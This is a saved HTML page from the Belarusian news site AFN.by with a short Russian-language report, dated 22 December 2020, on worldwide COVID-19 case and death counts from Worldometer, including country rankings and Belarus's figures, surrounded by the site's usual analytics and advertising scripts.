
<!DOCTYPE html>
<html>
<head><title>
	В мире число заражений коронавирусом превысило 77,71 млн | ВОЗ Пандемия Коронавирус | АФН | Белорусские новости | Республика Беларусь | Минск
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta property="og:image" content="/images/logo.gif" /><link rel="alternate" type="application/rss+xml" title="AFN.BY - Новости Беларуси" href="/news/rss/" /><link rel="icon" href="https://afn.by/favicon.ico" type="image/x-icon" />
    <link href="/styles/cocss.css?v=2020-09-16T2305" rel="stylesheet" type="text/css" />
    <!--[if lte IE 6]>
    <link href="/styles/ie6.css" rel="stylesheet" type="text/css" />
	<![endif]-->
	
	<meta name="keywords" content="ВОЗ Пандемия Коронавирус Число подтвержденных случаев заражения коронавирусом нового типа во всем мире составляет 77718154 (+534657 за сутки) по данным Worldometer на 8:38 22 декабря 2020 года. От болезни COVID-19 уже умерли 1709011 (+9367) человек." /><meta name="description" content="Число подтвержденных случаев заражения коронавирусом нового типа во всем мире составляет 77718154 (+534657 за сутки) по данным Worldometer на 8:38 22 декабря 2020 года. От болезни COVID-19 уже умерли 1709011 (+9367) человек." /> 
	<link rel="stylesheet" type="text/css" href="/styles/cocss2.css" />
	

	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	  ga('create', 'UA-261460-1', 'auto');
	  ga('send', 'pageview');
	</script>
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('chuaoc_Qf5oBaF0jf1u_J5PaDqti6EO9B3Q0cN4cczz.H7');
	var pp_gemius_hitcollector = 'gaby.hit.gemius.pl';
	//--><!]]>
	</script>
	<script type="text/javascript" src="/scripts/xgemius.js"></script>
	<script type='text/javascript'>
	(function() {
		var w = window,
		d = document,
		protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:',
		aml = typeof admixerML !== 'undefined' ? admixerML : { };
		aml.fn = aml.fn || [];
		aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
		aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
		if (!w.admixerML) {
			var lodash = document.createElement('script');
			lodash.id = 'amlScript';
			lodash.async = true;
			lodash.type = 'text/javascript';
			lodash.src = aml.cdnPath + 'scripts3/loader2.js';
			var node = d.getElementsByTagName('script')[0];
			node.parentNode.insertBefore(lodash, node);
			w.admixerML = aml;
		}
	})();
	</script>
	<script type='text/javascript'>
		admixerML.fn.push(function() {
                admixerML.defineSlot({z: '2febba63-69cc-42a7-8be2-e10bcbe63cd5', ph: 'admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.defineSlot({z: 'a95e2ad3-94ac-4d52-9a1c-87227345965a', ph: 'admixer_a95e2ad394ac4d529a1c87227345965a_zone_16335_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.singleRequest();
	});
	</script>
<script data-ad-client="ca-pub-5271363197717881" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--giraffio start
<script type="text/javascript" src="//code.giraff.io/data/widget-afnby.js" async></script>
<!--giraffio end-->
<link href="/WebResource.axd?d=THc8N3S2QkNQqMfl-WTie7cxeKRizU7tc7N60RHbrcj44yBJsW2ah91bqt1hozGOVJ9Lzyy6wzJ7Z4fWBM68ZUFq0yxae3Ry3Yc6Qseymu-MWSkniP2-WFm9EjR0giB-Ss2ocLqAtGS3ptB3kqGNqw2&amp;t=633477618823728610" type="text/css" rel="stylesheet" /></head>
<script type="text/javascript">
	<!--
	var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	//-->
</script>
<body>
    <!--div style="height:10px;"></div-->
    <form method="post" action="./285095?docid=285095&amp;doctype=news" id="form1">
<input type="hidden" name="C_C_SM_HiddenField" id="C_C_SM_HiddenField" value="" />
<input type="hidden" name="__VIEWSTATE_KEY" id="__VIEWSTATE_KEY" value="VIEWSTATE_107.23.218.4_637442376615331794" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />


<script type="text/javascript">
//<![CDATA[
var __cultureInfo = {"name":"ru-RU","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":",","IsReadOnly":true,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":" ","CurrencySymbol":"₽","NaNSymbol":"не число","CurrencyNegativePattern":8,"NumberNegativePattern":1,"PercentPositivePattern":1,"PercentNegativePattern":1,"NegativeInfinitySymbol":"-∞","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":",","NumberGroupSeparator":" ","CurrencyPositivePattern":3,"PositiveInfinitySymbol":"∞","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":",","PercentGroupSeparator":" ","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"","Calendar":{"MinSupportedDateTime":"\/Date(-62135596800000)\/","MaxSupportedDateTime":"\/Date(253402289999999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":true},"DateSeparator":".","FirstDayOfWeek":1,"CalendarWeekRule":2,"FullDateTimePattern":"d MMMM yyyy \u0027г.\u0027 H:mm:ss","LongDatePattern":"d MMMM yyyy \u0027г.\u0027","LongTimePattern":"H:mm:ss","MonthDayPattern":"d MMMM","PMDesignator":"","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"dd.MM.yyyy","ShortTimePattern":"H:mm","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"ShortestDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"DayNames":["воскресенье","понедельник","вторник","среда","четверг","пятница","суббота"],"AbbreviatedMonthNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthNames":["Январь","Февраль","Март","Апрель","Май","Июнь","Июль","Август","Сентябрь","Октябрь","Ноябрь","Декабрь",""],"IsReadOnly":true,"NativeCalendarName":"григорианский календарь","AbbreviatedMonthGenitiveNames":["янв","фев","мар","апр","мая","июн","июл","авг","сен","окт","ноя","дек",""],"MonthGenitiveNames":["января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря",""]},"eras":[1,"наша эра",null,0]};//]]>
</script>

<script src="/ScriptResource.axd?d=akSou45Evp7QYCR6rCy7htnANdHwjDkxFyw36HKSo-8wMdXD9de7URVRMYA51QOIzoWdyxwX0sMjwWU2TzMx4l4Qae2TLQlFVihq1iCOjWSjxpMfsK79SS6cB6nWo__eoZfe-4JwvmEnb7dZSD-vXPY4VBsSz_iUFM1z9dz-vw41&amp;t=4f7d5f1" type="text/javascript"></script>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdADmvVXD1oYELeveMr0vHCmYPqih6D9VxXIEBoVk/yioaqYzdrXIwSbpSp1+CtexH/UzAAU1SdwJCADYzZWWrdNAQUO/w9pCfuH07oY/pIoqHZY1i8k8SkNnh3CO0bLNz/a42/dRGoqareFVYEm4FCvvGk/L6x7hxW24uEgIPNbiy+yMeYKH5vnotf7NtQHj7/hxcHo5H+lr3jIoSFZotihlL6vkuIW9vmAnNgcVlynV15ULaeYGQ91gcxlUAeYUstcoeHU8y8Rr+JHAKYr6fsqcbPmOIMdD6JlOwIe+V5ytwLPQ7X7RVvEkZ29YRD0c4SsQ1YxBJcRXSDTed9b5GC4Ig0KXZ2iU3OSgJi+mG5EoImJObOMEPE8mrmkTK9yrwCqdjy+pIYgqC9zZX6bOHKGROoXxdcUlHpCQftierlEAgHNHZNH46fp7sa/E2Qk/jnwXWYKcVSAiR6XjySg1/V4eDjg2sanLGGQdpU6RNBRGIA4KLeLBKXgO8cZnzK6/g0+YxTFjRvPl9RADNdu+pcpJ5EiuFJidllRo3oxbCbBSUT+/MjCxgCPh4oE2fz+hBkUcK9zbuBw66E4fWGxLiKgbHW+cZ8jFcWQnJE2TBtZePI581UyHB5QTa9Dc4h781X7uC4HZ1+3AiAPji2KpueKq47UXhfDg8BRsri964wnFIyiudJ98k+c2GYUHSjLoWNedGV5u4ccRQf8ZQWxGbvJLZXCosOx8ochAoQrfnjCVWYzpgs3j2U4VnjSjjf0o+a5YPKV6GM4q4GHc8Fnp2I54/+m9TRmw6vorV8FcSAA8VDW1k+fo5luyACNNfEdPc6k704IFdna5R7640+bl+yuR1n5X0RAkIDyxWmSuy+c+zD/ni/ZNMDwcLI0cxEBRp1/e3hwbSuEDnhQAxhYLp59yTxps5tTg0DmDQcctmInVlhEe8ng23Iwckv6IkI1nzs7rLIF5qIXl+kxHYFWC95TDffuVYAuN4JWOf+RpKZlYJoplmUm4oCWBcRa3Zcdm28zsWH3HkyE+mNWTPTa/+rJk1i4YA/q/yKLcWc2+BWUHciv08gFyVOhHgDxltXe9/mmZwdtMJIK94FeMtaZ35QgXi/+vNzoOYieV7J+ESBfoU/WL0z4SPGQ+6jPMUCMNddlclGK2tHBMMdS0PUjcVSD8cpBZH92XBfFU2YkVbr8yRd+xxf/7MKHYOKckUYeJUrvMmB1V+AbLfMfmzirShs2UWMPNXPn6LKEPLdMqNo5HXCg==" />
		
		<div style="margin: 10px auto 20px;">
			<div id='admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'></div>
		</div>
		<script type='text/javascript'>
		admixerML.fn.push(function() { admixerML.display('admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'); });
		</script>
		<div id="hd">
			<div id="logo">
				<a href="../../"><img src="/images/logo.gif" alt="АФН - Белорусское информационное агенство" width="120" height="60" border="0" /></a>
			</div>
			<div class="c">
				<ul id="toolbar">
					<li class="first"><a href="../../">Главная</a>&nbsp;&nbsp;</li><li><a href="../../news">Новости</a></li><li><a href="../../finances">Финансы</a></li><li><a href="../../oil">Нефть</a></li>
				</ul>
				<ul id="additional_toolbar">
					<li><a href="/sitemap">Карта сайта</a></li>
				</ul>
				<br />
				
				<div class="info">Последнее обновление: 22.12.2020 12:33</div>
				
			</div>
			
		</div>
        	
	<div id="container">
		<div id="content">
			<div class="wrapper">
				<!--:/news/i/285095:-->
<div class="banner-placeholder">
<!-- Yandex.RTB R-A-465488-1 -->
<div id="yandex_rtb_R-A-465488-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-1",
                renderTo: "yandex_rtb_R-A-465488-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
</div>

				
	
    
<div id="d285095" class="doc">
    <div class="hd">
        
        <h1>В мире число заражений коронавирусом превысило 77,71 млн</h1>
        
	<div style="float:left;font-size:1em;margin-right: 20px;">
        <div><span><a href="../2020/12/22">22.12.2020 08:57</a></span>&nbsp;|&nbsp;<span><a href="http://afn.by" rel="nofollow" target="_blank">АФН</a></span></div>
        
        <div>Категории: <a href="../category/1,192">ВОЗ</a> <a href="../category/2,12636">Пандемия</a> <a href="../category/3,15647">Коронавирус</a></div>
	    
	</div>
	<div id="fb-root" style="margin-top:10px;"></div><script src="//connect.facebook.net/en_US/all.js#appId=177634385630657&amp;xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="250" show_faces="true" font="trebuchet ms"></fb:like>
    </div>
    <div class="bd">
    <p>Число подтвержденных случаев заражения коронавирусом нового типа во всем мире составляет 77718154 (+534657 за сутки) по данным Worldometer на 8:38 22 декабря 2020 года. От болезни COVID-19 уже умерли 1709011 (+9367) человек.</p><p>Случаи заражения зафиксированы в 218 странах. На данный момент лечение проходит 21415746 (+32697) человек, из них 106271 (-42) находятся в тяжелом состоянии. От болезни вылечились 54593397 (+503717) человек.</p><p>В пятерку стран по числу случаев заражения входят: США с 18473716 (+200109) случаями заражения, Индия – 10075422 (+19174), Бразилия – 7264221 (+25621), Россия – 2877727 (+29350) и Франция – 2479151 (+5797). Беларусь – на 49 (-) месте.</p><p>В пятерку стран по числу случаев заражения за последние сутки входят: США – 200109, Великобритания – 33364, Россия – 29350, Бразилия – 25621, Индия – 19333. Беларусь (1893) – на 35 (+11) месте.</p><p>В пятерку стран по числу смертей от COVID-19 входят: США – 326772, Бразилия – 187322, Индия – 146145, Мексика – 118202 и Италия – 69214. Беларусь – на 74 (+1) месте.</p><p>В пятерку стран по числу смертей от COVID-19 за последние сутки входят: США – 1841, Бразилия – 549, Германия – 533, Россия – 493, Италия – 415. Беларусь – на 69 (-3) месте.</p><p>В Беларуси официально подтверждены 175416 случаев заражения коронавирусом и 1333 смерти.</p><p></p>
    </div>
    <div class="ft"></div>
</div>
    <div class="clear" style="width:99%;">
		
		<div class="clear"></div>
		
<div class="l">

	<div class="hd">
		Ранее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/285069">
				<span class="time">21.12 09:35</span> <span class="title">В мире число заражений коронавирусом превысило 77,12 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285067">
				<span class="time">21.12 07:49</span> <span class="title">Израиль приостановил полеты в Британию, Данию и ЮАР из-за нового типа коронавируса</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285058">
				<span class="time">20.12 10:21</span> <span class="title">В мире число заражений коронавирусом превысило 76,63 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285038">
				<span class="time">19.12 10:01</span> <span class="title">В мире число заражений коронавирусом превысило 76,01 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285019">
				<span class="time">18.12 09:47</span> <span class="title">В мире число заражений коронавирусом превысило 75,28 млн</span>
				</a>
			</li>
		
			</ul>
		
</div>

    </div>
	<div class="clear"></div>
<br><br>
<!--LuckyAds-->
<div data-la-block="4e3e7c89-f061-45c3-9ca4-e90e26604ad9"></div>
<!-- Composite Start 
<div id="M617914ScriptRootC973088"></div>
<script src="https://jsc.lentainform.com/a/f/afn.by.973088.js" async></script>
<!-- Composite End -->

<!--giraff-->
<!--<div id="grf_afnby_2"></div>--->
<!--<div id="M242oY8Bs7fkyrP7JVbL" data-type="2" class="blockOfO1b2l3"></div>-->

    
<div class="clear"></div>
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'afnby'; // required: replace example with your forum shortname

    // The following are highly recommended additional parameters. Remove the slashes in front to use.
    // var disqus_identifier = 'unique_dynamic_id_1234';
    // var disqus_url = 'http://example.com/permalink-to-page.html';

    var disqus_identifier = 'afnby_news_285095';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
<noindex>
<a href="//disqus.com" class="dsq-brlink" rel="nofollow">blog comments powered by <span class="logo-disqus">Disqus</span></a>
</noindex>

<!--

<div id="comments">
    <div class="hd" style="display:none">
		<h4>Комментарии</h4>
    	
	</div>
    
</div>


-->
<!--
<span id="C_C_Co_CommentsClosedLabel" class="commentsClosed">Комментарии запрещены</span>
-->
    
    
				<div class="adv clear">
					<!--2657565487752-->
				</div>
			</div>
		</div>
		<div id="info">			
			
	<div id="C_I_Ca" class="calendar"><div class="c"><table id="C_I_PC" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7579')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" width="70%">Ноябрь 2020</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7640')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">26</td><td align="center" width="14%">27</td><td align="center" width="14%">28</td><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%">31</td><td align="center" width="14%"><a href="/news/2020/11/01">1</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/11/02">2</a></td><td align="center" width="14%"><a href="/news/2020/11/03">3</a></td><td align="center" width="14%"><a href="/news/2020/11/04">4</a></td><td align="center" width="14%"><a href="/news/2020/11/05">5</a></td><td align="center" width="14%"><a href="/news/2020/11/06">6</a></td><td align="center" width="14%"><a href="/news/2020/11/07">7</a></td><td align="center" width="14%"><a href="/news/2020/11/08">8</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/11/09">9</a></td><td align="center" width="14%"><a href="/news/2020/11/10">10</a></td><td align="center" width="14%"><a href="/news/2020/11/11">11</a></td><td align="center" width="14%"><a href="/news/2020/11/12">12</a></td><td align="center" width="14%"><a href="/news/2020/11/13">13</a></td><td align="center" width="14%"><a href="/news/2020/11/14">14</a></td><td align="center" width="14%"><a href="/news/2020/11/15">15</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/11/16">16</a></td><td align="center" width="14%"><a href="/news/2020/11/17">17</a></td><td align="center" width="14%"><a href="/news/2020/11/18">18</a></td><td align="center" width="14%"><a href="/news/2020/11/19">19</a></td><td align="center" width="14%"><a href="/news/2020/11/20">20</a></td><td align="center" width="14%"><a href="/news/2020/11/21">21</a></td><td align="center" width="14%"><a href="/news/2020/11/22">22</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/11/23">23</a></td><td align="center" width="14%"><a href="/news/2020/11/24">24</a></td><td align="center" width="14%"><a href="/news/2020/11/25">25</a></td><td align="center" width="14%"><a href="/news/2020/11/26">26</a></td><td align="center" width="14%"><a href="/news/2020/11/27">27</a></td><td align="center" width="14%"><a href="/news/2020/11/28">28</a></td><td align="center" width="14%"><a href="/news/2020/11/29">29</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/11/30">30</a></td><td align="center" width="14%">1</td><td align="center" width="14%">2</td><td align="center" width="14%">3</td><td align="center" width="14%">4</td><td align="center" width="14%">5</td><td align="center" width="14%">6</td></tr>
</table></div><div class="c"><table id="C_I_C" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7610')" style="color:Black" title="Go to the previous month"></a></td><td align="center" width="70%">Декабрь 2020</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7671')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">30</td><td align="center" width="14%"><a href="/news/2020/12/01">1</a></td><td align="center" width="14%"><a href="/news/2020/12/02">2</a></td><td align="center" width="14%"><a href="/news/2020/12/03">3</a></td><td align="center" width="14%"><a href="/news/2020/12/04">4</a></td><td align="center" width="14%"><a href="/news/2020/12/05">5</a></td><td align="center" width="14%"><a href="/news/2020/12/06">6</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/07">7</a></td><td align="center" width="14%"><a href="/news/2020/12/08">8</a></td><td align="center" width="14%"><a href="/news/2020/12/09">9</a></td><td align="center" width="14%"><a href="/news/2020/12/10">10</a></td><td align="center" width="14%"><a href="/news/2020/12/11">11</a></td><td align="center" width="14%"><a href="/news/2020/12/12">12</a></td><td align="center" width="14%"><a href="/news/2020/12/13">13</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/14">14</a></td><td align="center" width="14%"><a href="/news/2020/12/15">15</a></td><td align="center" width="14%"><a href="/news/2020/12/16">16</a></td><td align="center" width="14%"><a href="/news/2020/12/17">17</a></td><td align="center" width="14%"><a href="/news/2020/12/18">18</a></td><td align="center" width="14%"><a href="/news/2020/12/19">19</a></td><td align="center" width="14%"><a href="/news/2020/12/20">20</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/21">21</a></td><td align="center" bgcolor="Silver" width="14%"><font color="White"><a href="/news/2020/12/22">22</a></font></td><td class="future" align="center" width="14%">23</td><td class="future" align="center" width="14%">24</td><td class="future" align="center" width="14%">25</td><td class="future" align="center" width="14%">26</td><td class="future" align="center" width="14%">27</td></tr><tr><td class="future" align="center" width="14%">28</td><td class="future" align="center" width="14%">29</td><td class="future" align="center" width="14%">30</td><td class="future" align="center" width="14%">31</td><td class="future" align="center" width="14%">1</td><td class="future" align="center" width="14%">2</td><td class="future" align="center" width="14%">3</td></tr><tr><td class="future" align="center" width="14%">4</td><td class="future" align="center" width="14%">5</td><td class="future" align="center" width="14%">6</td><td class="future" align="center" width="14%">7</td><td class="future" align="center" width="14%">8</td><td class="future" align="center" width="14%">9</td><td class="future" align="center" width="14%">10</td></tr>
</table></div></div>
	<div class="clear"></div>
	
<div class="l">

	<div class="hd">
		В мире
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/285099">
				<span class="time">22.12 09:40</span> <span class="title">Европарламент предлагает Британии продлить переходный период после Brexit</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285093">
				<span class="time">21.12 23:11</span> <span class="title">Еврокомиссия одобрила вакцину BioNTech и Pfizer</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285083">
				<span class="time">21.12 16:31</span> <span class="title">В Бельгии задержаны главари европейского наркокартеля</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285069">
				<span class="time">21.12 09:35</span> <span class="title">В мире число заражений коронавирусом превысило 77,12 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285067">
				<span class="time">21.12 07:49</span> <span class="title">Израиль приостановил полеты в Британию, Данию и ЮАР из-за нового типа коронавируса</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285064">
				<span class="time">21.12 07:17</span> <span class="title">Штаб Трампа подал апелляцию в Верховный суд США по Пенсильвании</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285061">
				<span class="time">20.12 21:18</span> <span class="title">Европа усиливает ограничения из-за мутации коронавируса в Великобритании</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285058">
				<span class="time">20.12 10:21</span> <span class="title">В мире число заражений коронавирусом превысило 76,63 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285054">
				<span class="time">20.12 09:35</span> <span class="title">США отказались от заявления с обвинением России в кибератаке</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285053">
				<span class="time">20.12 08:59</span> <span class="title">Минздрав Израиля обеспокоен новой мутацией коронавируса в Европе</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285052">
				<span class="time">20.12 08:34</span> <span class="title">Нидерланды прервали авиасообщение с Великобританией из-за нового штамма коронавируса</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285047">
				<span class="time">19.12 15:28</span> <span class="title">Американская авиабаза в Афганистане попала под ракетный обстрел</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285040">
				<span class="time">19.12 10:08</span> <span class="title">В США получила допуск уже вторая вакцина от коронавируса</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285038">
				<span class="time">19.12 10:01</span> <span class="title">В мире число заражений коронавирусом превысило 76,01 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285019">
				<span class="time">18.12 09:47</span> <span class="title">В мире число заражений коронавирусом превысило 75,28 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285017">
				<span class="time">18.12 09:37</span> <span class="title">США экстренно регистрируют вакцину Moderna</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285015">
				<span class="time">18.12 09:16</span> <span class="title">От кибератаки на цели в США пострадала компания Microsoft</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285002">
				<span class="time">17.12 14:14</span> <span class="title">Премьер Испании ушел на карантин после выявления коронавируса у Макрона</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285001">
				<span class="time">17.12 14:06</span> <span class="title">Трамп устраивает истерики из-за проигрыша на выборах</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284989">
				<span class="time">17.12 08:53</span> <span class="title">ВОЗ посоветовала отмечать Новый год на улице</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284986">
				<span class="time">17.12 08:18</span> <span class="title">В мире число заражений коронавирусом превысило 74,53 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284981">
				<span class="time">16.12 22:34</span> <span class="title">Главный фигурант дела о нападении на Charlie Hebdo получил 30 лет</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284960">
				<span class="time">16.12 11:02</span> <span class="title">В мире число заражений коронавирусом превысило 73,84 млн</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284941">
				<span class="time">15.12 16:55</span> <span class="title">ЕС выделяет 500 млн евро на вакцины для бедных стран</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/284925">
				<span class="time">15.12 11:00</span> <span class="title">В мире число заражений коронавирусом превысило 73,21 млн</span>
				</a>
			</li>
		
			</ul>
		
</div>

	<!--False-->

			<div class="adv clear">
<!-- Yandex.RTB R-A-465488-2 -->
<div id="yandex_rtb_R-A-465488-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-2",
                renderTo: "yandex_rtb_R-A-465488-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<!-- sidebar start -->
<!--<div id="grf_afnby"></div>-->
<!-- sidebar end -->

</div>

		<!--	-->
</div>
		<div id="nav">
			<div>
				<br />
				<ul id="menu">
					<li><a href="../top">Главное</a></li>
					
							
							<li><a href="../politics">Политика</a></li>
						
							<li><a href="../economy">Экономика</a></li>
						
							<li><a href="../energy">Энергетика</a></li>
						
							<li><a href="../social">Общество</a></li>
						
						
				</ul>
			</div>
			
			
			<div class="redBtn">
				<a href="/news/i/279946">afn.by заблокирован Мининформом<br><br>Помоги сайту</a>
			</div>
			
		</div>
	</div>

		<div id="ft">
			<div class="c">
				&copy; 1995-2019 УП "Ньюс-Релиз"<br />
				<a href="../../contacts">Контактная информация</a> | <a href="../../copyrights">Права на использование</a>
			</div>
			<div class="clear">
			</div>
			
	

		</div>
    </form>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(421539, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        trackHash:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/421539" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- Sape counter -->
<script type="text/javascript">
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
</script>
<!-- Sape counter -->

<script>window.RESOURCE_O1B2L3 = 'sdfgdgf.info';</script>
<script src="//sdfgdgf.info/ux/CHxq.js" ></script>


